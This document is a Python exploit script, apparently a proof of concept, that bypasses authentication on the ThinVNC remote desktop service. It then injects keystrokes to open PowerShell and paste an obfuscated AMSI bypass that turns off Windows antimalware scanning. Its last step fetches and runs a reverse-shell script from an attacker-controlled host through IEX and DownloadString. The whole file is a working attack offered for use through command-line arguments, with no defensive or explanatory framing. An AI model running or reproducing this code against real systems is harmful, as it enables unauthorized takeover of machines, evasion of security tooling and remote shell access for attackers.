import requests
import time
import argparse
proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close",
}
def login_sid(base_url):
url = base_url + "/cmd?cmd=connect&destAddr=poc&id=0"
cookies = {"SID": ""}
r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
return r.json()['id']
def start_sid(base_url, sid):
url = base_url + "/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=%s" % sid
cookies = {"SID": "%s" % sid}
r = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
time.sleep(2)
def send_ctrl_esc(base_url, sid):
url = base_url + "/cmd?cmd=fkey&key=CtrlEsc&id=%s" % sid
cookies = {"SID": "%s" % sid}
requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
time.sleep(2)
def send_text(base_url, sid, text):
url = base_url + "/cmd?id=%s&cmd=cli&type=clipboard&action=paste" % sid
cookies = {"SID": "%s" % sid}
data = text
requests.post(url, headers=headers, cookies=cookies, proxies=proxies, data=data)
time.sleep(2)
def send_enter(base_url, sid):
url = base_url + "/cmd?cmd=keyb&key=13&char=0&action=down&id=%s" % sid
cookies = {"SID": "%s" % sid}
requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
time.sleep(2)
parser = argparse.ArgumentParser(description='ThinVNC exploit')
parser.add_argument('-s', '--server-ip', required=True, help='ThinVNC IP')
parser.add_argument('-p', '--server-port', required=True, help='ThinVNC PORT')
parser.add_argument('-r', '--reverse-ip', required=True, help='Reverse Shell IP')
parser.add_argument('-a', '--reverse-port', required=True, help='Reverse Shell PORT')
args = parser.parse_args()
url = 'http://%s:%s' % (args.server_ip,args.server_port)
print("[*] ThinVNC Auth Bypass to RCE exploit")
print
print("[+] Getting sid")
sid = login_sid(url)
print("[+] Initializing sid")
start_sid(url, sid)
print("[+] Sending Ctrl+Esc sid")
send_ctrl_esc(url, sid)
print("[+] Opening run")
send_text(url, sid, "run")
send_enter(url, sid)
print("[+] Sending Reverse Shell")
amsi_txt = """powershell.exe -exec bypass"""
send_text(url, sid, amsi_txt)
send_enter(url, sid)
amsi_txt = """S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )"""
send_text(url, sid, amsi_txt)
send_enter(url, sid)
rev_shell_txt = "IEX((New-Object System.Net.WebClient).DownloadString('http://<attacker>:8002/rev.ps1'))"
send_text(url, sid, rev_shell_txt)
send_enter(url, sid)